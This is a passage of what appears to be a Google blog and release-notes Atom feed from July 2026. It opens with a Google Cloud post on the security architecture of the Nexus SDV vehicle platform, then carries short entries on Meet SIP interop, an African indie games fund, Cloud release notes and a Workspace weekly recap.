&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Nexus AI serves as the platform’s intelligent engine, transforming the vehicle from a passive data source into a proactive, agentic partner. Using Gemini models and Gemini Enterprise Agent Platform, Nexus AI can analyze complex telemetry in real-time to provide information for autonomous decision-making and hyper-personalized driver assistance, effectively acting as an intelligent agent that anticipates user needs. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Crucially, this advanced intelligence is paired with a focus on significant total cost of ownership (TCO) reduction. By using high-efficiency Arm-based compute and Bigtable-optimized data storage, the platform lowers the operational costs associated with processing massive data volumes. This modular, AI-native architecture ensures that manufacturers can scale their fleet intelligence rapidly without the prohibitive cloud and development expenses traditionally associated with next-generation vehicle software.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Cloud-native under the hood&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The architecture of Nexus SDV is built on a modular, cloud-native foundation designed to bridge the gap between the vehicle edge and the data center. Deep compatibility with AAOS is the keystone of the close integration between the cloud and the vehicle, and will help ensure that high-fidelity telemetry is ingested and synchronized in real-time. This robust data loop allows Nexus AI to quickly push intelligent updates and services back to the vehicle. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By providing this developer-friendly, open framework, Nexus SDV enables manufacturers to manage the entire lifecycle of a SDV with the scalability and reliability of the Google Cloud ecosystem.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_sErFoiT.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Architecture for Nexus SDV.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Defense in depth with Google Cloud Security controls&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By building on Google's secure foundations, including secure-by-design and Zero Trust architecture, Nexus SDV supports the heavy lifting of compliance and threat protection. To achieve this, the Nexus SDV architecture implements a comprehensive, defense-in-depth security model across six key elements:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Mutual TLS (mTLS) and public key infrastructure (PKI)&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Nexus SDV relies on cryptographic trust chains to authenticate vehicles before any data exchange can occur. The infrastructure uses &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/certificate-authority-service"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Certificate Authority Service&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (CAS) to manage distinct CA pools (server, factory, and registration CAs), ensuring a highly available and secure root of trust. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Specifically, the registration server enforces registration by forcing clients to present a valid "factory-issued" certificate during the initial TLS handshake, extracting and parsing the certificate directly from the connection stream to definitively prove the vehicle's identity. During registration, the server performs &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/Certificate_signing_request" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Certificate Signing Request&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (CSR) validation sent by the vehicle before issuing a new operational certificate.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Identity and access management&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The system uses identity brokering where &lt;/span&gt;&lt;a href="https://www.keycloak.org/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Keycloak&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is deployed as the central OpenID Connect (OIDC) identity provider. Vehicles authenticate against Keycloak using their operational certificate via mTLS to receive a short-lived JSON Web Token (JWT). &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For fine-grained access control, a custom NATS Auth Callout service provides dynamic subject permissions: It intercepts all messaging broker connection attempts, validates the Keycloak JWT using public JWK keys, and programmatically maps the vehicle's roles to specific NATS subjects. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For secure service-to-service communication, it uses &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/workload-identity-federation"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Workload Identity Federation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; so pipelines exchange GitHub OIDC tokens for temporary Google Cloud access, removing static credentials, while&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/workload-identity"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt; GKE Workload Identity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; allows Kubernetes Pods to access backend services like Bigtable by binding Kubernetes service accounts to Google service accounts. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security is reinforced through &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigtable/docs/oauth-scopes"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;restricted IAM scopes&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, ensuring dedicated service accounts are provisioned with minimal permissions, such as the data API being restricted only to reading from Bigtable. Using &lt;/span&gt;&lt;a href="https://cloud.google.com/security/vpc-service-controls"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VPC-SC&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/resource-manager/docs/organization-policy/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Organization policy constraints&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/private-service-connect"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Private Service Connect (PSC)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in your deployment context also helps you achieve secure foundations.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Secret management&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Nexus SDV relies on centralized secret management to protect sensitive information. All sensitive configurations, database passwords, and cryptographic signing keys are generated dynamically during Terraform infrastructure provisioning and locked inside &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/secret-manager"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Secret Manager&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A &lt;/span&gt;&lt;a href="https://github.com/google-github-actions/get-secretmanager-secrets#get-secretmanager-secrets" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;secret fetching&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; during deployment is used to avoid baking secrets into application code and container images. Instead, services pull signing keys and credentials directly into memory only at runtime, minimizing exposure both at rest and in transit.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Network isolation&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To enforce network isolation, the underlying computer infrastructure is heavily shielded. Nexus SDV runs on &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/legacy/network-isolation"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;private GKE clusters&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; where worker nodes have no public IP addresses, preventing direct internet exposure. Additionally, the Keycloak PostgreSQL database uses &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/sql/docs/mysql/sql-proxy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL IAM Authentication&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, which allows the Cloud SQL Proxy to connect securely using IAM roles rather than relying on static database passwords or managing IP allowlists. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Secure AI Framework&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud secures these advanced AI capabilities through a comprehensive, enterprise-grade framework that prioritizes data privacy, model governance, and safe execution, based on guidance from the &lt;/span&gt;&lt;a href="https://saif.google/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Secure AI Framework&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (SAIF). With Gemini Enterprise Agent Platform, security and governance are natively embedded into the machine-learning lifecycle through capabilities, such as dedicated Explainability and Safety controls, continuous Evaluation and Monitoring, and secure model registries. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can learn more about how we &lt;/span&gt;&lt;a href="https://cloud.google.com/security/securing-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;secure AI here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data API&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Instead of allowing downstream applications and external clients direct access to data stores like Bigtable, Nexus SDV routes data retrieval through a custom Data API. This microservice acts as a secure abstraction layer that translates strictly, such as querying specific vehicle IDs, sensor data types, and predefined time windows, into heavily constrained Bigtable row-range scans and column filters. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By doing so, it serves as a secure gateway that enforces structured data access patterns. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Start your journey with Nexus SDV&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Nexus SDV represents a new era of automotive intelligence, delivering an agentic, secure, and cost-efficient platform that empowers manufacturers to harness the full power of AI in an open-source framework. You can learn more about how we are &lt;/span&gt;&lt;a href="https://nexus-sdv.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;redefining the software-defined vehicle here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/shift-into-high-gear-with-agents-securing-the-software-defined-vehicle" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-06T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/join-video-conferences-on-google-meet-hardware-via-SIP-through-Pexip.html</id>
    <title>Join video conferences on Google Meet hardware via SIP through Pexip</title>
    <updated>2026-07-06T14:52:27+00:00</updated>
    <content type="html">&lt;p&gt;You can now join video conferences on Google Meet hardware via SIP through a Pexip interop gateway. This brings universal connectivity for users to join meetings hosted on any SIP-compatible platform directly from their Meet rooms. The functionality is available for room hardware based on both Android and ChromeOS.&lt;/p&gt;&lt;p&gt;The SIP functionality for Meet hardware enables critical in-meeting interactions, such as DTMF (Dual-Tone Multi-Frequency) capabilities that allow users to navigate meeting IVRs (interactive voice response systems), e.g., "Press 1 to raise your hand" and entering numeric meeting passcodes.&lt;/p&gt;&lt;p&gt;Distinct administrator settings are provided for managing SIP dial-out functionality separately from other Pexip-based integrations.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUXNrywUH1uo9kaisD2qgYSzS92RD4DgH_TdG_TjMCAK6kH5iIlP7W4QSlCQpq10G19uBs7G6_I4uxNBXTefyV9qIUTa-ElrewmiRa__P9diPJVNrvqXVoJZsBYV4xR8UI2m5F2O39y0_MqL03qmbuGUWIHcFGHzP0Vtlu_m5QJNMzrtpOVPGUQ8QM6ac/s1904/Join%20video%20conferences%20on%20Google%20Meet%20hardware%20via%20SIP%20through%20Pexip%20-%207114%20-%201.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUXNrywUH1uo9kaisD2qgYSzS92RD4DgH_TdG_TjMCAK6kH5iIlP7W4QSlCQpq10G19uBs7G6_I4uxNBXTefyV9qIUTa-ElrewmiRa__P9diPJVNrvqXVoJZsBYV4xR8UI2m5F2O39y0_MqL03qmbuGUWIHcFGHzP0Vtlu_m5QJNMzrtpOVPGUQ8QM6ac/s1600/Join%20video%20conferences%20on%20Google%20Meet%20hardware%20via%20SIP%20through%20Pexip%20-%207114%20-%201.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Join SIP calls with a single touch from the room agenda&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;br /&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJrmYEW2N59ZdtBgfDeJ3E78rZ6JW0LotR5F8mA93TT-1Lk6AGdhyphenhyphenGNG552kLKzI5emia2Ps9F22eTMO1g4mmTjDTxXn0Kncbmwc6lh3KyqMVTKetyP-8C5eOQ8sE_hxa3KAjvzrTxRPlGI0VSpA-hKOpsX66qYbeV-DWlnE4mDrOzyxlz0njj-egJHKs/s1756/Join%20video%20conferences%20on%20Google%20Meet%20hardware%20via%20SIP%20through%20Pexip%20-%207114%20-%202.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJrmYEW2N59ZdtBgfDeJ3E78rZ6JW0LotR5F8mA93TT-1Lk6AGdhyphenhyphenGNG552kLKzI5emia2Ps9F22eTMO1g4mmTjDTxXn0Kncbmwc6lh3KyqMVTKetyP-8C5eOQ8sE_hxa3KAjvzrTxRPlGI0VSpA-hKOpsX66qYbeV-DWlnE4mDrOzyxlz0njj-egJHKs/s1600/Join%20video%20conferences%20on%20Google%20Meet%20hardware%20via%20SIP%20through%20Pexip%20-%207114%20-%202.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;SIP interoperability setting for administrators&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature will be off by default and can be disabled or enabled at the domain, OU, or group level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/allow-meet-hardware-to-join-third-party-video-conferencing-services" target="_blank"&gt;learn more&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;There is no end user setting for this feature.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 6, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Google Meet hardware devices*&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;*Functionality requires a separate Pexip subscription&lt;/i&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/allow-meet-hardware-to-join-third-party-video-conferencing-services" target="_blank"&gt;Allow Meet hardware to join third-party video conferencing services&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Meet Hardware Help: &lt;a href="https://knowledge.workspace.google.com/admin/meet-hardware/meet-interoperability-faq" target="_blank"&gt;Meet interoperability FAQ&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/join-video-conferences-on-google-meet-hardware-via-SIP-through-Pexip.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-06T14:52:27+00:00</published>
  </entry>
  <entry>
    <id>https://android-developers.googleblog.com/2026/07/Indie-Games-Fund-Africa.html</id>
    <title>Google Play launches the first Indie Games Fund in Africa</title>
    <updated>2026-07-06T13:00:00+00:00</updated>
    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVaj2uWBON3o1zwwUkgNlLg-ZaLaCDp6myrMrmYMlLIl2zA6438CvmUIPQ8We2FfLSrdwTpcKA_JTGs8gnSibQ2k8b8fb6f-h61WRd8v0WLyyrFCV0YqpVix-1HsVj5g2uuofXmDmjqyWh5IzkmcqfqXthM8dGhQhw06U34XRB5xon72Fq0SEndEifDN8/s2048/IGFund26_Metadata%20Card.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Steph Pio, Strategic Partnerships Manager, Google Play EMEA&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;em&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj86YrBhsnBplvegJfEidJDWTSlkZ8i8WT_TpXfsiaamFA3ILGZKZgz9AkX3-JJTvYTO3qcyJdDnn0GakXbA3GvrKvqucP5n67-XtPAigihdacSOJ1D448iiIyF7gjY68vBmXAAAvtZRISJbhZWhxjx4_mPD92R4KqgEg3xk46WO0qJtm-xQkGMShiHbKs/s4209/IGFund26_Blogger%20Header.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj86YrBhsnBplvegJfEidJDWTSlkZ8i8WT_TpXfsiaamFA3ILGZKZgz9AkX3-JJTvYTO3qcyJdDnn0GakXbA3GvrKvqucP5n67-XtPAigihdacSOJ1D448iiIyF7gjY68vBmXAAAvtZRISJbhZWhxjx4_mPD92R4KqgEg3xk46WO0qJtm-xQkGMShiHbKs/s16000/IGFund26_Blogger%20Header.png" /&gt;&lt;/a&gt;&lt;/em&gt;&lt;/div&gt;&lt;em&gt;&lt;br /&gt;&lt;/em&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Sub-Saharan Africa is home to some of the world’s most creative storytelling. To help bring those stories to a global audience, today, we’re proud to announce the debut of Google Play’s Indie Games Fund in Africa.&lt;/p&gt;

&lt;p&gt;The region’s unique creativity has fueled a vibrant game development scene, helping drive what is quickly becoming one of the most exciting, resilient, and fast-growing gaming markets. It’s a space defined by immense talent. However, access to capital is a persistent hurdle, and a significant investment gap often holds back incredibly promising local studios.&lt;/p&gt;

&lt;p&gt;With this inaugural fund, we’re committing $1 million USD to help address that gap. This fund will empower 10 indie game studios across Sub-Saharan Africa to scale their businesses and realize their full potential.&lt;/p&gt;

&lt;h3&gt;Funding and support for selected studios&lt;/h3&gt;

&lt;p&gt;This program is designed to drive long-term growth, where it can make the biggest impact. Selected studios will receive a share of the $1 million fund, with individual investments ranging from $50,000 to $200,000 to help elevate their games. Alongside this financial backing, recipients will benefit from dedicated mentorship and hands-on technical support. Together, these awards are designed to help them scale their businesses and reach a global audience.&lt;/p&gt;

&lt;h3&gt;Who can apply?&lt;/h3&gt;

&lt;p&gt;The program is open to indie game developers based in Sub-Saharan Africa (see the &lt;a href="https://rsvp.withgoogle.com/events/africa-indie-games-fund-2026/terms"&gt;list of eligible countries&lt;/a&gt;) who have launched a game—whether it’s on Google Play, another mobile platform, PC, or console.&lt;/p&gt;

&lt;p&gt;Review the &lt;a href="https://rsvp.withgoogle.com/events/africa-indie-games-fund-2026/terms"&gt;eligibility criteria&lt;/a&gt; and &lt;a href="https://rsvp.withgoogle.com/events/africa-indie-games-fund-2026/home"&gt;apply now&lt;/a&gt;. Applications close at 12 noon UTC on July 31, 2026.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://android-developers.googleblog.com/2026/07/Indie-Games-Fund-Africa.html" rel="alternate"/>
    <category term="Android Developers"/>
    <published>2026-07-06T13:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_06_2026</id>
    <title>Cloud Release Notes — July 06, 2026</title>
    <updated>2026-07-06T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;For &lt;a href="https://docs.cloud.google.com/bigquery/docs/facebook-ads-transfer"&gt;data transfers from Facebook Ads&lt;/a&gt;,
support for the &lt;code&gt;AdInsightsMMM&lt;/code&gt; report has been temporarily disabled. Existing
data transfers from Facebook Ads that include the &lt;code&gt;AdInsightsMMM&lt;/code&gt; report will
continue to run, but the transfer won't include data from the &lt;code&gt;AdInsightsMMM&lt;/code&gt;
report.&lt;/p&gt;
&lt;p&gt;This change is due to schema changes in the Facebook Ads API.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/bigquery/docs/transfer-changes#Jul06-fb-ads"&gt;July 06, 2026&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Bigtable&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Bigtable supports direct connectivity, which bypasses the Google frontend and
optimizes performance for application traffic that meets certain criteria. For
more information, see &lt;a href="https://docs.cloud.google.com/bigtable/docs/performance#direct-connectivity"&gt;Direct connectivity&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_06_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-06T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/search/blog/2026/07/search-central-live-deep-dive-europe-2026</id>
    <title>Search Central Deep Dive Europe 2026: Apparently we're going to Barcelona</title>
    <updated>2026-07-06T00:00:00+00:00</updated>
    <content type="html">&lt;p&gt;
      We're excited to officially announce the next stop for
  Search Central Live Deep Dive Europe 2026! Mark your calendars: based directly on
  your feedback, we're headed to
  Barcelona, Spain, from September 30 to October 2, 2026.
      &lt;/p&gt;</content>
    <link href="https://developers.google.com/search/blog/2026/07/search-central-live-deep-dive-europe-2026" rel="alternate"/>
    <category term="Search Central"/>
    <published>2026-07-06T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://ai.google.dev/gemini-api/docs/changelog#07-06-2026</id>
    <title>Gemini API — 2026-07-06</title>
    <updated>2026-07-06T00:00:00+00:00</updated>
    <content type="text">Logi deweloperskie interfejsu Interactions API: logi obsługiwanych wywołań interfejsu Interactions API są teraz widoczne w panelu AI Studio .</content>
    <link href="https://ai.google.dev/gemini-api/docs/changelog#07-06-2026" rel="alternate"/>
    <category term="Gemini API"/>
    <published>2026-07-06T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_05_2026</id>
    <title>Cloud Release Notes — July 05, 2026</title>
    <updated>2026-07-05T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;Release 6.3.92 is being rolled out to the first phase of regions as listed &lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/overview-and-introduction/soar-gradual-release"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This release contains internal and customer bug fixes.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_05_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-05T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_04_2026</id>
    <title>Cloud Release Notes — July 04, 2026</title>
    <updated>2026-07-04T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/release-notes#June_28_2026"&gt;Release 6.3.91&lt;/a&gt; is now available for all regions.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_04_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-04T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/weekly-recap-07-03-2026.html</id>
    <title>Google Workspace Weekly Recap - July 3, 2026</title>
    <updated>2026-07-03T19:31:10+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;Updated admin setting for improved video quality in Google Meet&lt;/h3&gt;&lt;p&gt;In April 2026, we updated Meet to improve video quality on high-resolution displays. We’re now updating the way the Admin console setting that limits video bandwidth works to reduce data usage and improve call quality.&amp;nbsp;| &lt;a href="https://workspaceupdates.googleblog.com/2026/06/updated-admin-setting-for-improved-video-quality-in-Google-Meet.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Educators and students can now share Gemini Canvas creations directly to Google Classroom&lt;/h3&gt;&lt;p&gt;Educators and students of all ages can now seamlessly attach Gemini Canvas artifacts, like websites, quizzes, interactive games, infographics, and more, to Google Classroom assignments and posts. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/educators-and-students-can-now-share-Gemini-Canvas-creations-directly-to-Google-Classroom.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Assign mobile device management admin privileges based on organizational unit&lt;/h3&gt;&lt;p&gt;We’re giving admins more granular control over how mobile device management privileges are delegated. Specifically, admins can be assigned privileges for specific organizational units (OUs), adding another layer of security by scoping access only to necessary OUs. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/assign-mobile-device-management-admin-privileges-based-on-organizational-unit.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Data regions support for the Gemini app now available&lt;/h3&gt;&lt;p&gt;The Gemini app adheres to your organization’s data regionalization requirements. As with Google Workspace, admins have the flexibility to configure controls for EU storage and processing, US storage and processing, or both, including granular settings down to the organizational unit (OU) level. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/gemini-app-data-regions-support.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Create fully native and editable presentations with Gemini in Google Slides&lt;/h3&gt;&lt;p&gt;You can now create a full, multi-slide presentation using Gemini in Google Slides. With a single prompt, you can ground the presentation in existing content from Google Drive, match the style of another presentation, and build fully editable slides, allowing you to make any necessary adjustments. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/create-fully-native-and-editable-presentations-with-Gemini-in-Google-Slides.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Ask Gemini in Drive now available on mobile&lt;/h3&gt;&lt;p&gt;In April, we announced the general availability of Ask Gemini in Drive on the web. We’re now bringing this feature to the Drive Android and iOS apps. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/ask-gemini-in-drive-now-available-on-mobile.html" target="_blank"&gt;Learn 